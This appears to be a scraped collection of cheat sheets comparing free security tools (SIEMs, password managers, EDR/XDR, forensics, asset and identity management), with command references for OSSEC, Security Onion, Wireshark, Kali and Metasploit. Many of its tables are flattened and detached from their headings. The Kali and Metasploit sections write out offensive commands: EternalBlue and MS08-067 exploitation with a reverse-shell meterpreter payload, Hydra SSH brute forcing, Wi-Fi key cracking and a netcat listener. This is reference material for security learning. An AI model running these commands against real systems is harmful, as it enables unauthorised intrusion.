  • Data visualization and dashboards (Kibana)

Technical Features:

  • Highly scalable and flexible

  • Supports a wide range of data sources and formats

  • Extensive plugin ecosystem

Integration & Deployment:

  • Can be integrated with security tools (e.g., Wazuh, OSSEC) for SIEM use

  • Requires custom configuration for security use cases

Limitations:

  • Lacks built-in security analytics and correlation rules

  • Requires significant setup and tuning for SIEM functionality

User Reviews:

  • Highly praised for visualization and search capabilities

  • Users note the need for expertise to build a full SIEM solution .


6. Prelude OSS

Overview: Prelude OSS is an open-source SIEM that supports various log formats and integrates with tools like OSSEC and Snort.

Core Functionality:

  • Log collection and normalization

  • Event correlation and alerting

  • Integration with IDS/IPS tools

Technical Features:

  • Modular architecture

  • Supports multiple data sources

Integration & Deployment:

  • Suitable for small deployments and evaluation

  • Can be extended with commercial modules

Limitations:

  • Limited scalability and features compared to other SIEMs

  • Smaller community and less frequent updates

User Reviews:

  • Considered a good entry-level SIEM for small organizations .


7. MozDef (Mozilla Defense Platform)

Overview: MozDef is a scalable SIEM platform developed by Mozilla, designed for cloud and microservices environments.

Core Functionality:

  • Real-time event ingestion and correlation

  • Automated incident response workflows

  • Scalable event indexing (Elasticsearch backend)

Technical Features:

  • Built for high-volume environments

  • Integrates with Docker and cloud-native tools

Integration & Deployment:

  • Best suited for organizations with DevOps expertise

  • Requires setup of supporting infrastructure (Elasticsearch, RabbitMQ, etc.)

Limitations:

  • Less user-friendly for beginners

  • Smaller user base and community

User Reviews:

  • Praised for scalability and automation features

  • Users note the need for technical expertise .


8. Sagan

Overview: Sagan is a high-performance, real-time log analysis and correlation engine, often used alongside Snort.

Core Functionality:

  • Real-time log analysis and alerting

  • Correlation with network IDS events

  • Scriptable response actions

Technical Features:

  • Lightweight and fast

  • Supports custom rule sets

Integration & Deployment:

  • Integrates with Snort and other IDS/IPS tools

  • Suitable for performance-sensitive environments

Limitations:

  • Focused on log analysis; lacks broader SIEM features

  • Requires manual rule creation and tuning

User Reviews:

  • Valued for speed and efficiency

  • Best for organizations with existing IDS infrastructure .


Cheat Sheet: Quick Comparison Table

Tool
Core Focus
Strengths
Limitations
Best For

General Limitations of Free SIEM Tools

  • Feature Gaps: Free versions may lack advanced analytics, machine learning, or automated response features found in commercial SIEMs .

  • Scalability: Some tools are best suited for small to medium environments; large-scale deployments may require significant tuning or commercial add-ons.

  • Support: Free tools rely on community support; professional support is often limited or paid .

  • Integration: While integration is possible, it may require manual configuration and technical expertise .

  • Documentation: Quality and depth of documentation can vary; some tools have extensive guides, others rely on community wikis .


User & Community Feedback

  • Wazuh and Security Onion are consistently praised for their active communities, frequent updates, and comprehensive documentation.

  • ELK Stack is lauded for its flexibility and visualization but requires expertise to adapt for SIEM use.

  • OSSIM is valued for its breadth of features but can be challenging to configure and maintain.

  • OSSEC is appreciated for its simplicity and reliability in endpoint monitoring.

  • MozDef and Sagan are more niche, with positive feedback from technically advanced users but less mainstream adoption .


How to Choose?

  • For all-in-one, easy deployment: Security Onion

  • For endpoint and log monitoring: Wazuh or OSSEC

  • For custom, scalable SIEM: ELK Stack (with Wazuh/OSSEC integration)

  • For network-centric environments: Security Onion or Sagan

  • For cloud-native/DevOps: MozDef


Tip: Always start with a pilot deployment, leverage community forums for support, and plan for ongoing tuning and maintenance to maximize the value of free SIEM tools.


This summary and cheat sheet should help you quickly compare, select, and deploy the best free SIEM solution for your cybersecurity needs.

Free Password Manager

Comprehensive Summary & Cheat Sheet: Free Password Managers & Tools

This guide provides a detailed overview and quick-reference cheat sheet for the most popular free password managers and related tools. It covers core features, security, platform compatibility, import/export options, and user/community reviews, helping you choose the best free solution for your needs.


1. Bitwarden

Core Features:

  • Unlimited Password Storage: Store as many passwords as you need, even on the free plan.

  • Cross-Platform Sync: Syncs across unlimited devices (Windows, macOS, Linux, iOS, Android, web).

  • Browser Extensions: Available for Chrome, Firefox, Safari, Edge, Opera.

  • Open Source: Code is publicly available for audit and improvement.

  • Password Generator: Built-in tool for strong, random passwords.

  • Two-Factor Authentication (2FA): Supports basic 2FA for added security.

  • Security Reports: Identifies weak, reused, or compromised passwords.

  • Import/Export: Easy migration via CSV/JSON; export for local backup.

  • Backup: Cloud-based automatic backup; manual export possible.

Security:

  • Encryption: AES-256 bit encryption, PBKDF2 SHA-256 key derivation.

  • Zero-Knowledge: Only you can access your data.

  • 2FA Support: TOTP, email, and more.

User Reviews:

  • Highly rated for transparency, open-source nature, and robust free features. Community and tech reviewers consistently recommend Bitwarden as the best free password manager overall .

Limitations (Free Version):

  • Some advanced 2FA options and security reports require a paid plan.


2. KeePass

Core Features:

  • Local Storage: Passwords are stored locally, not in the cloud.

  • Open Source: Fully open-source and highly customizable.

  • Plugins: Extensive plugin ecosystem for added features (e.g., auto-backup, browser integration).

  • Password Generator: Advanced options for creating strong passwords.

  • Cross-Platform: Officially for Windows; community ports for macOS, Linux, Android (KeePassDroid), iOS (MiniKeePass).

  • Import/Export: Supports CSV, XML, and other formats.

  • Backup: Manual or plugin-based automatic backups.

Security:

  • Encryption: AES-256 encryption.

  • 2FA: Supports key files and plugins for multi-factor authentication.

  • Zero-Knowledge: All encryption/decryption is local.

User Reviews:

  • Praised for security, flexibility, and being fully offline. Some users find the interface dated and setup less user-friendly compared to cloud-based managers .

Limitations (Free Version):

  • No built-in cloud sync; requires manual file management or third-party sync (e.g., Dropbox, Google Drive).

  • No official browser extensions (third-party only).


3. LastPass Free

Core Features:

  • Cross-Device Sync: Free plan allows syncing across one device type (either mobile or desktop, not both).

  • Browser Extensions: Chrome, Firefox, Safari, Edge.

  • Password Generator: Built-in.

  • Security Dashboard: Monitors password health.

  • Import/Export: CSV export/import.

  • Backup: Cloud-based automatic backup.

Security:

  • Encryption: AES-256 bit encryption.

  • 2FA: Supports multi-factor authentication.

  • Zero-Knowledge: Provider cannot access your data.

User Reviews:

  • Once the most popular free manager, but recent security incidents and device sync restrictions have led to mixed reviews. Still valued for ease of use and browser integration .

Limitations (Free Version):

  • Only one device type at a time (mobile or desktop).

  • Some advanced features (e.g., dark web monitoring) are paid-only.


4. Zoho Vault

Core Features:

  • Unlimited Password Storage: No cap on entries.

  • Cross-Platform: Web, mobile apps.

  • 2FA: Supported.

  • Password Generator: Included.

  • Import/Export: Supported.

  • Backup: Cloud-based.

Security:

  • Encryption: Strong encryption standards.

  • Zero-Knowledge: Yes.

User Reviews:

  • Appreciated for unlimited storage and team features, but interface is less polished than some competitors .

Limitations (Free Version):

  • Some advanced sharing and team features are paid-only.


5. Dashlane Free

Core Features:

  • Single Device Use: Free plan limited to one device.

  • Password Generator: Yes.

  • Security Alerts: Notifies of breaches.

  • Import/Export: Supported.

  • Backup: Cloud-based.

Security:

  • Encryption: AES-256.

  • 2FA: Supported.

User Reviews:

  • Praised for user-friendly design and security alerts, but single-device limit is a major drawback .

Limitations (Free Version):

  • One device only; multi-device sync is paid.


6. NordPass Free

Core Features:

  • Unlimited Password Storage: Yes.

  • Cross-Device Sync: Only one device active at a time.

  • Password Generator: Yes.

  • Import/Export: Supported.

  • Backup: Cloud-based.

Security:

  • Encryption: XChaCha20 encryption.

  • 2FA: Supported.

User Reviews:

  • Known for ease of use and strong security, but device sync limitation is a common complaint .

Limitations (Free Version):

  • Only one device at a time.


7. RoboForm Free

Core Features:

  • Unlimited Password Storage: Yes.

  • Form Filling: Advanced form-filling capabilities.

  • Emergency Access: Included.

  • Import/Export: Supported.

  • Backup: Cloud-based.

Security:

  • Encryption: AES-256.

  • 2FA: Supported.

User Reviews:

  • Valued for form-filling and emergency access, but interface is less modern than some competitors .

Limitations (Free Version):

  • Some features (e.g., cloud backup, multi-device sync) are paid-only.


8. Proton Pass

Core Features:

  • Identity Protection: Yes.

  • Password Storage: Unlimited.

  • Cross-Device Sync: Yes.

  • Open Source: Yes.

  • Import/Export: Supported.

  • Backup: Cloud-based.

Security:

  • Encryption: End-to-end encryption.

  • 2FA: Supported.

User Reviews:

  • Newer entrant, praised for privacy focus and integration with Proton’s secure ecosystem .

Limitations (Free Version):

  • Some advanced features may be paid in the future.


9. LogMeOnce

Core Features:

  • Passwordless Login: Yes.

  • Identity Theft Protection: Yes.

  • Cloud Storage Encryption: Yes.

  • Import/Export: Supported.

  • Backup: Cloud-based.

Security:

  • Encryption: Strong encryption standards.

  • 2FA: Supported.

User Reviews:

  • Noted for innovative features like passwordless login, but interface can be overwhelming for beginners .

Limitations (Free Version):

  • Some features are paid-only.


Cheat Sheet: Quick Comparison Table

Tool
Unlimited Storage
Device Sync (Free)
2FA
Open Source
Browser Ext.
Mobile Apps
Import/Export
Backup
Notable Limitations (Free)

Key Takeaways & Recommendations

  • Best Overall Free Manager: Bitwarden stands out for its unlimited storage, cross-device sync, open-source transparency, and robust security features .

  • Best for Local/Offline Use: KeePass is ideal if you want full control and local-only storage, with strong security and customizability .

  • Best for Simplicity: LastPass Free and Dashlane Free are user-friendly but have device sync limitations.

  • Best for Privacy: Proton Pass and Bitwarden, both open-source, are highly trusted for privacy and security.

  • Best for Teams: Zoho Vault offers unlimited storage and is suitable for both individuals and teams, though some features are paid.


User & Community Feedback

  • Bitwarden is highly praised for its transparency, open-source model, and generous free tier.

  • KeePass is favored by tech-savvy users for its security and flexibility, though it requires more manual setup.

  • LastPass has lost some trust due to recent security incidents and device sync restrictions, but remains popular for ease of use.

  • Dashlane and NordPass are appreciated for their interfaces but criticized for device limitations in free plans.

  • Zoho Vault and Proton Pass are gaining traction for privacy and team features.


Final Advice

When choosing a free password manager, consider your priorities: device sync, privacy, open-source, or ease of use. For most users, Bitwarden offers the best balance of features, security, and usability in its free version. For those who prefer local-only storage and maximum control, KeePass is unmatched. Always enable two-factor authentication and regularly back up your password database, regardless of the tool you choose .


If you need more details on a specific tool or want a step-by-step setup guide, let me know!

Free XDR and EDR

Comprehensive Summary & Cheat Sheet: Free EDR and XDR Cyber Tooling

This guide provides a detailed overview and quick-reference cheat sheet for leading free Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) tools. It covers core features, user/community reviews, technical considerations, and integration capabilities.


1. Free EDR Tools: Overview, Features, and Reviews

OSSEC

  • Type: Open-source EDR

  • Core Features:

    • Log analysis and real-time Windows registry monitoring

    • Malware/rootkit detection

    • Endpoint scanning and log data analysis

    • Active response (e.g., firewall policy enforcement)

    • System inventory (hardware, network services)

    • Integration with third-party applications

  • Reviews & Community Feedback:

    • Highly regarded for its flexibility and strong community support

    • Considered reliable for log-based detection and compliance monitoring

    • Some users note a steeper learning curve for advanced configurations


TheHive Project

  • Type: Security Incident Response Platform (with EDR capabilities)

  • Core Features:

    • Dynamic dashboards and advanced filtering

    • Forensics and cross-analysis (integrates with VirusTotal, etc.)

    • Task assignment and real-time information sharing

  • Reviews & Community Feedback:

    • Praised for collaborative incident response workflows

    • Strong integration with other open-source tools

    • Best suited for teams with some security operations experience


Osquery

  • Type: Open-source endpoint visibility tool

  • Core Features:

    • Interactive querying of OS data (processes, users, network connections)

    • Host-monitoring daemon for log aggregation

    • Configuration, performance, and health tracking

  • Reviews & Community Feedback:

    • Valued for its flexibility and transparency

    • Requires SQL knowledge for advanced queries

    • Often used as a building block in custom EDR solutions


Nessus (Essentials)

  • Type: Vulnerability scanner (with EDR-adjacent features)

  • Core Features:

    • Custom scripting and plugin support

    • In-depth vulnerability scanning and patching indicators

  • Reviews & Community Feedback:

    • Widely used for vulnerability management

    • Free version has some feature limitations compared to paid tiers


Snort

  • Type: Intrusion Prevention/Detection System (IDS/IPS)

  • Core Features:

    • Real-time traffic analysis and packet logging

    • Multiple deployment modes (sniffer, logger, NIDS)

    • Useful for audits and threat investigations

  • Reviews & Community Feedback:

    • Highly respected in the network security community

    • Requires tuning to minimize false positives


2. Free XDR Tools: Overview, Features, and Reviews

Wazuh

  • Type: Open-source XDR platform

  • Core Features:

    • Integrates with Suricata (NIDS) and OSSEC (EDR)

    • Scalable log collection and event correlation (Elasticsearch backend)

    • Custom detection rules (YARA, Sigma)

    • Community-driven development and support

  • Reviews & Community Feedback:

    • Praised for flexibility, scalability, and strong documentation

    • Active community and frequent updates

    • Some complexity in initial setup for large environments


Security Onion

  • Type: Linux distribution for security monitoring (XDR capabilities)

  • Core Features:

    • Full packet capture, network and host-based IDS

    • Unified security monitoring dashboard

    • Integrates multiple open-source tools (e.g., Suricata, Zeek, Wazuh)

  • Reviews & Community Feedback:

    • Highly regarded for comprehensive monitoring

    • Strong community and regular enhancements

    • Resource-intensive; best for dedicated security appliances


OpenEDR

  • Type: Open-source EDR/XDR platform

  • Core Features:

    • Real-time endpoint monitoring and behavioral analysis

    • Customizable detection rules

    • Community-driven enhancements and transparency

  • Reviews & Community Feedback:

    • Noted for being truly free with no licensing fees

    • Adaptable to organizations of any size

    • Community support is a key strength; some users desire more enterprise-level features


3. Feature Comparison & Integration Capabilities

Tool
Real-Time Detection
Custom Rules
Integration
Scalability
Community Support
Automation
  • Integration: Most tools support integration with other open-source and commercial security solutions via APIs, connectors, or log forwarding.

  • Customization: Open-source nature allows for deep customization, especially in Wazuh, Security Onion, and OpenEDR.

  • Scalability: Wazuh and Security Onion are designed to scale from small to large environments.


4. Technical Considerations & Deployment

  • System Requirements: Vary by tool; most require Linux (some support Windows/Mac), with minimum hardware depending on deployment size. Security Onion and Wazuh can be resource-intensive for large-scale monitoring .

  • Deployment Guides: All tools provide official documentation and community guides. Security Onion and Wazuh offer detailed step-by-step installation and configuration instructions.

  • Support: Free tools rely on community forums, GitHub issues, and user-contributed documentation. Paid support may be available for some (e.g., Wazuh).


5. Real-World Use and Limitations

  • Adoption: Free EDR/XDR tools are widely used in small to medium businesses, educational institutions, and by security researchers.

  • Limitations:

    • May lack advanced features (e.g., AI-driven analytics, automated remediation) found in commercial products

    • Support and updates depend on community activity

    • Initial setup and tuning can be complex, especially for large or heterogeneous environments


6. Quick Cheat Sheet

Tool
Best For
Notable Strengths
Notable Weaknesses

7. Summary

Free EDR and XDR tools such as OSSEC, TheHive, Osquery, Wazuh, Security Onion, and OpenEDR offer robust capabilities for threat detection, incident response, and security monitoring. They are highly customizable, benefit from strong community support, and are suitable for organizations seeking cost-effective security solutions. However, they may require more hands-on management and lack some advanced features of commercial offerings. For organizations with technical expertise and a willingness to engage with open-source communities, these tools provide a powerful foundation for modern cyber defense .

Getting Started

Create your first site

Basics

Learn the basics of GitBook

Publish your docs

Share your docs online

FTK Imager

Imaging

Windows

Disk imaging, file recovery

Not a full analysis suite

Autopsy

Analysis

Win/Lin/Mac

GUI, timeline, plugins

Resource-intensive

Volatility

Memory Forensics

Win/Lin/Mac

RAM analysis, plugins

CLI, learning curve

Wireshark

Network

Win/Lin/Mac

Packet capture, protocol analysis

Large files, privacy

SIFT Workstation

Platform

VM (Ubuntu)

Full suite, ready-to-use

Large download

CAINE

Platform

Live Linux

Live forensics, broad toolset

Some outdated tools

Scalpel

File Carving

Win/Lin

Fast file recovery

False positives

John the Ripper

Password

Win/Lin/Mac

Password cracking

Slow on complex hashes

Aircrack-ng

Wireless

Win/Lin

Wi-Fi key cracking

Hardware needed

Maltego

OSINT

Win/Lin/Mac

Data visualization

Limited free features

ManageEngine Endpoint Central

Windows, macOS, Linux

Asset mgmt, patching, remote control, compliance

Limited endpoints/features

User-friendly, robust features

Action1

Windows

Patch mgmt, remote access, automation, reporting

100 endpoints

Easy to use, comprehensive

OCS Inventory NG

Windows, Linux

Inventory, software deployment, monitoring

Open-source

Powerful, UI/docs could improve

Lansweeper

Windows

Asset mgmt, network scanning, inventory

100 devices

Cost-effective, easy to use

NinjaOne MDM

macOS

Automated mgmt, deployment, compliance

Free trial

Seamless Mac management

Jamf

macOS

Apple device mgmt, security, compliance

Free trial

Industry standard for Apple

osquery

Linux/Unix

System queries, monitoring, security

Open-source

Flexible, powerful

Infection Monkey

Linux/Unix

Breach simulation, vulnerability assessment

Open-source

Great for security testing

SaltStack

Linux/Unix

Config mgmt, automation, orchestration

Open-source

Scalable, flexible

Bacon Unlimited

Win, macOS, Linux

Unified mgmt, policy enforcement, security

Varies

Centralized, multi-OS support

Scalefusion UEM

Multi-OS

UEM, zero-trust, device security

Varies

Broad OS support, unified mgmt

FileWave

Multi-OS

Asset mgmt, deployment, multi-OS support

Varies

Versatile, mixed environments

Pandora FMS

Multi-OS

Monitoring, alerting, reporting

Free version

Robust, no-cost monitoring

TeamViewer RMM

Multi-OS

Remote support, monitoring, patching

Free for personal use

Trusted, easy remote support

AweSun

Win, iOS, Android

Remote desktop, basic mgmt

Free version

Good TeamViewer alternative

GreyNoise

Threat Intelligence

Community API, Research

Filters internet noise, real-time data, SIEM/SOAR integration, free for basic use

MISP

Threat Intelligence

Open-source

Structured sharing, auto-correlation, multi-format export

AlienVault OTX

Threat Intelligence

Free

Community-driven, real-time pulses, IOCs sharing

OpenCTI

Threat Intelligence

Open-source

Unified threat management, STIX/TAXII support

Yeti

Threat Intelligence

Open-source

IOC management, automated feed imports, API

Cuckoo Sandbox

Malware Analysis

Open-source

Sandbox analysis, detailed reports

CISA KEV Catalog

Vulnerability DB

Public

Known exploited vulnerabilities, regular updates

MITRE CVE

Vulnerability DB

Public

Standardized CVE IDs, global reference

MITRE ATT&CK

Threat Framework

Public

Adversary tactics/techniques, detection/response

MITRE-Cyber-Security-CVE

Vulnerability DB

Open-source

Aggregated CVE data, JSON format, community contributions

FBI (IC3, NCIJTF, etc.)

Cybercrime Intel

Public resources

Incident reporting, advisories, no standalone vulnerability DB

AssetTiger

Cloud-based

Small businesses

Free for up to 250 assets

Snipe-IT

Open-source

Teams with limited tech skills

Free (self-hosted)

Spiceworks

Cloud/on-prem

General IT asset tracking

Free

CMDBuild

Open-source

Customizable asset management

Free

Ralph 3

Open-source

Data centers, large environments

Free

GLPI

Open-source

Hardware/software/network assets

Free

Open-AudIT

Open-source

Network discovery/inventory

Free (community edition)

OCS Inventory NG

Open-source

Hardware/software inventory

Free

AssetTiger

Manual/import

Yes

Yes

Yes

Yes

Limited

Snipe-IT

Manual/import

Yes

Yes

Yes

Yes

REST API

Spiceworks

Auto/manual

Yes

Yes

Yes

Yes

Yes

CMDBuild

Manual/custom

Yes

Yes

Yes

Yes

Yes

Ralph 3

Auto/manual

Yes

Yes

Yes

Yes

Yes

GLPI

Auto/manual

Yes

Yes

Yes

Yes

Yes

Open-AudIT

Auto/manual

Yes

Yes

Yes

Yes

Yes

OCS Inventory

Auto/manual

Yes

Yes

Yes

Yes

Yes

AssetTiger

250 assets

Small orgs

Cloud

Limited

Moderate

Snipe-IT

None (self-hosted)

Customizable, open src

On-prem/cloud

REST API

Strong

Spiceworks

None

General IT, easy setup

Cloud/on-prem

Yes

Strong

GLPI

None

Advanced tracking

On-prem/cloud

Yes

Strong

Ralph 3

None

Data centers

On-prem

Yes

Moderate

Open-AudIT

Community edition limits

Network discovery

On-prem

Yes

Moderate

OCS Inventory

None

Hardware/software inv.

On-prem

Yes

Moderate

KeyCloak

Open-source SSO and identity management for modern apps/services

Web/mobile SSO, OAuth2, OIDC

MidPoint

Open-source, comprehensive identity management (provisioning, governance)

Enterprise user lifecycle

OpenIAM

Suite for identity governance, access management, and admin

Enterprise IAM, SSO, provisioning

Shibboleth

Federated identity, SSO, widely used in academia

SSO for universities, research

FusionAuth

Developer-friendly IAM with SSO, MFA, user management

App authentication, SSO, MFA

Apache Syncope

Open-source digital identity management for enterprises

User provisioning, RBAC

KeyCloak

Yes

Yes

Via external plugins

MidPoint

Yes

Yes

Limited/3rd party

OpenIAM

Yes

Yes

Limited/3rd party

Shibboleth

Yes

Yes

Not native

FusionAuth

Yes

Yes

Via external plugins

Syncope

Yes

Yes

Limited/3rd party

KeyCloak

Yes

Yes

Yes

Java, DB (Postgres/MySQL), Docker

MidPoint

Yes

Yes

Yes

Java, DB, Tomcat

OpenIAM

Yes

Yes

Yes

Java, DB, Tomcat

Shibboleth

Yes

Yes

Yes

Java, Apache, Tomcat

FusionAuth

Yes

Yes

Yes

Java, DB, Docker

Syncope

Yes

Yes

Yes

Java, DB, Tomcat

KeyCloak

Yes

Yes

Yes

Yes

Yes

Yes

SAML, OIDC, OAuth2, LDAP

Strong

MidPoint

Yes

Yes

Yes

Yes

Yes

Yes

SAML, LDAP, REST

Moderate

OpenIAM

Yes

Yes

Yes

Yes

Yes

Yes

SAML, OIDC, LDAP, REST

Moderate

Shibboleth

Yes

Yes

Yes

Yes

Yes

Yes

SAML, LDAP

Strong (academic)

FusionAuth

Yes

Yes

Yes

Yes

Yes

Yes

SAML, OIDC, OAuth2, LDAP

Growing

Syncope

Yes

Yes

Yes

Yes

Yes

Yes

SAML, LDAP, REST

Moderate

OSSEC

Yes

Yes

High

Good

Strong

Moderate

TheHive

Yes (IR focus)

Yes

High

Good

Strong

Moderate

Osquery

Yes

Yes (SQL)

High

Good

Strong

Low

Nessus

No (scanning)

Yes

Moderate

Good

Strong

Low

Snort

Yes (network)

Yes

High

Good

Strong

Moderate

Wazuh

Yes

Yes

High

Excellent

Strong

High

Security Onion

Yes

Yes

High

Excellent

Strong

High

OpenEDR

Yes

Yes

High

Excellent

Strong

High

OSSEC

Log-based EDR, compliance

Flexibility, log analysis

Learning curve

TheHive

Incident response coordination

Collaboration, integration

IR focus, not pure EDR

Osquery

Endpoint visibility

Query flexibility, transparency

Requires SQL knowledge

Nessus

Vulnerability management

Depth of scanning

Not real-time EDR

Snort

Network threat detection

Network focus, customization

False positives

Wazuh

Unified XDR, scalability

Integration, scalability

Complex setup

Security Onion

Full-stack monitoring

Comprehensive, scalable

Resource-intensive

OpenEDR

Endpoint monitoring, XDR

Free, adaptable, community

Fewer enterprise features

wget https://github.com/ossec/ossec-hids/archive/master.tar.gz
tar -zxvf master.tar.gz
cd ossec-hids-*
sudo ./install.sh
sudo /var/ossec/bin/ossec-control start
<ossec_config>
  <global>
    <email_notification>yes</email_notification>
    <email_to>admin@example.com</email_to>
  </global>
  <rules>
    <include>rules/local_rules.xml</include>
  </rules>
  <active-response>
    <command>firewalldrop</command>
    <location>local</location>
    <level>10</level>
  </active-response>
  <syscheck>
    <frequency>3600</frequency>
    <directories check_all="yes">/etc,/usr/bin</directories>
  </syscheck>
</ossec_config>
<rule id="100001" level="10">
  <decoded_as>sshd</decoded_as>
  <description>Multiple failed SSH login attempts</description>
  <group>authentication_failures,</group>
  <frequency>5</frequency>
  <timeframe>60</timeframe>
  <same_source_ip />
</rule>
<decoder name="custom-ssh">
  <program_name>sshd</program_name>
  <regex>Failed password for (\w+) from (\d+\.\d+\.\d+\.\d+)</regex>
  <order>user, srcip</order>
</decoder>
<active-response>
  <command>firewalldrop</command>
  <location>local</location>
  <level>10</level>
  <timeout>600</timeout>
</active-response>

sudo /var/ossec/bin/ossec-control start

Start OSSEC

sudo /var/ossec/bin/ossec-control stop

Stop OSSEC

sudo /var/ossec/bin/ossec-control restart

Restart OSSEC

sudo /var/ossec/bin/manage_agents

Manage agent keys (add/remove/list)

sudo /var/ossec/bin/agent_control -l

List connected agents

sudo /var/ossec/bin/ossec-logtest

Test log messages against rules/decoders

/var/ossec/etc/ossec.conf

Main configuration file

/var/ossec/etc/rules/

Rule files

/var/ossec/etc/decoders/

Decoder files

/var/ossec/logs/

Log files

/var/ossec/active-response/

Active response scripts

0

Ignore

1-3

Low (informational)

4-7

Medium (suspicious)

8-15

High (attack/critical)

ossec.github.io
github.com/ossec/ossec-hids
OSSEC Documentation
Wazuh
OSSEC Documentation
Wazuh Documentation
OSSEC GitHub

Suricata

Network IDS/IPS, signature-based detection

Zeek (Bro)

Network analysis, protocol/file analysis

OSSEC

Host-based IDS (HIDS)

netsniff-ng

Full packet capture

Logstash

Log parsing and processing

Elasticsearch

Log indexing and search

Kibana

Dashboards and visualization

Sguil/Squert

Alert review and investigation

Playbooks

Guided alert triage and response

Redis

Log queuing

Check service status

sudo so-status

Start/stop services

sudo so-* start/stop

Update Security Onion

sudo soup

View logs

sudo tail -f /var/log/syslog

Packet capture (CLI)

sudo tcpdump -i <interface>

Check Elasticsearch status

curl -XGET 'localhost:9200/_cluster/health?pretty'

Access Kibana dashboard

https://<SO-IP>:5601

Access Sguil

sguil-client

Access Squert

https://<SO-IP>/squert

Restart node

sudo reboot

Kibana

https://<SO-IP>:5601

Squert

https://<SO-IP>/squert

Security Onion Console

https://<SO-IP>

Suricata

/nsm/sensor_data/<hostname>/suricata.log

Zeek

/nsm/sensor_data/<hostname>/zeek/

OSSEC

/var/ossec/logs/

Logstash

/var/log/logstash/

Elasticsearch

/var/log/elasticsearch/

Security Onion Docs
official Security Onion documentation
sudo ufw enable
sudo ufw default deny incoming
sudo ufw allow <port/service>
sudo systemctl disable <service>
sudo apt install unattended-upgrades

Network Scanning

Nmap, Wireshark

Web App Testing

ZAP, Burp Suite

Exploitation

Metasploit, BeEF

Password Cracking

John the Ripper, Hydra

Wireless Attacks

Aircrack-ng, Reaver

Forensics

Autopsy, Volatility

Reverse Engineering

Ghidra, Radare2

Social Engineering

Social-Engineer Toolkit (SET)

Vulnerability Analysis

OpenVAS, Nessus

Sniffing/Spoofing

Ettercap, Bettercap

Maintaining Access

Weevely, Netcat

Reporting

Dradis

nmap 192.168.1.1                # Basic scan
nmap -O 192.168.1.1             # OS detection
nmap -sV <target>               # Service/version detection
nmap -A <target>                # Aggressive scan
nmap <target> --top-ports 10    # Top 10 ports
msfconsole                      # Start Metasploit
use exploit/windows/smb/ms17_010_eternalblue
wireshark                       # Launch GUI
# Use filters like 'http' in the display filter bar
airodump-ng wlan0               # Capture packets
aircrack-ng capture_file.cap    # Crack WEP/WPA keys
hydra -l user -P passlist.txt ssh://192.168.1.1
john hash.txt
john --wordlist=passwords.txt hash.txt
burpsuite                       # Start Burp Suite
# Use Proxy tab to intercept traffic
nc -v 192.168.1.1 80            # Connect to TCP port
nc -lvp 4444                    # Listen for connections

Update System

sudo apt update && sudo apt upgrade

Start Firewall

sudo ufw enable

List Running Services

systemctl list-units --type=service

Change User Password

passwd

Add New User

sudo adduser <username>

SSH Key Generation

ssh-keygen -t rsa -b 4096

Install New Tool

sudo apt install <toolname>

Search for Tool

apt-cache search <keyword>

Check Disk Usage

df -h

Monitor Processes

htop

official Kali Linux website
Kali Linux Docs
official Kali Linux documentation
Kali Linux Desktop
Kali Linux Desktop

Start Capture

Ctrl+E

Cmd+E

Stop Capture

Ctrl+E

Cmd+E

Open File

Ctrl+O

Cmd+O

Save Capture

Ctrl+S

Cmd+S

Find Packet

Ctrl+F

Cmd+F

Go to Packet

Ctrl+G

Cmd+G

Next Packet

↓

↓

Previous Packet

↑

↑

Expand All

*

*

Collapse All

-

-

Apply Display Filter

Ctrl+L

Cmd+L

Clear Display Filter

Ctrl+Shift+L

Cmd+Shift+L

Mark Packet

Ctrl+M

Cmd+M

Unmark All Packets

Ctrl+Shift+M

Cmd+Shift+M

Colorize Conversation

Ctrl+H

Cmd+H

wireshark.org
Wireshark Official Documentation
Wireshark Display Filter Reference
Wireshark User’s Guide (PDF)
sudo apt update
sudo apt install metasploit-framework

help

List all available commands

search

Search for modules (e.g., search smb)

use

Select a module (e.g., use exploit/windows/smb/ms08_067_netapi)

info

Show detailed info about the selected module

show options

List configurable options for the current module

set

Set a module option (e.g., set RHOST 192.168.1.10)

run/exploit

Execute the selected module

sessions

List and interact with active sessions

jobs

List background jobs

kill

Terminate a job by ID

exit

Exit msfconsole

back

Return to the main prompt from a module

banner

Display a random Metasploit banner

connect

Netcat-like connection to a host/port (e.g., connect 192.168.1.1 23)

grep

Filter output (e.g., grep http search oracle)

check

Test if the target is vulnerable before exploiting

edit

Edit the current module in a text editor

msf > search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.10
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.100
msf exploit(ms08_067_netapi) > exploit

msfconsole

Start Metasploit console

search <keyword>

Search for modules

use <module_path>

Select a module

show options

Show module options

set <option> <value>

Set a module option

exploit or run

Execute the module

sessions -l

List active sessions

sessions -i <id>

Interact with a session

background

Background the current session

jobs

List background jobs

kill <job_id>

Kill a background job

exit

Exit msfconsole

db_nmap <target>

Run Nmap scan and import results

info <module>

Show detailed info about a module

check

Test if target is vulnerable

banner

Display a random banner

connect <host> <port>

Netcat-like connection

grep <pattern> <command>

Filter output

msf > search smb
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
msf exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.20
msf exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100
msf exploit(ms17_010_eternalblue) > exploit
msf > sessions -l
msf > sessions -i 1
official Metasploit website
Metasploit Docs
Metasploit Framework
Metasploit Logo
Metasploit Community Interface

Wazuh

Endpoint & log SIEM

Comprehensive, scalable, Elastic

Needs tuning, learning curve

Most organizations

Security Onion

Network & host SIEM

All-in-one, easy deployment

Resource-intensive, complex at scale

Network-centric environments

OSSEC

Host IDS

Lightweight, reliable

Limited SIEM features

Endpoint monitoring

OSSIM

Unified SIEM

Feature-rich, free

Fewer features than USM, complex

Small/medium orgs

ELK Stack

Log mgmt & visualization

Flexible, powerful dashboards

Not SIEM by default, setup needed

Custom SIEM builds

Prelude OSS

Modular SIEM

Integrates with IDS, modular

Limited scale/features

Small orgs, evaluation

MozDef

Cloud-native SIEM

Scalable, automation

Technical setup, small community

DevOps/cloud teams

Sagan

Log correlation

Fast, scriptable

Narrow focus, manual rules

IDS-heavy environments

Kibana Dashboard Example

Bitwarden

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Yes

Some advanced 2FA paid

KeePass

Yes

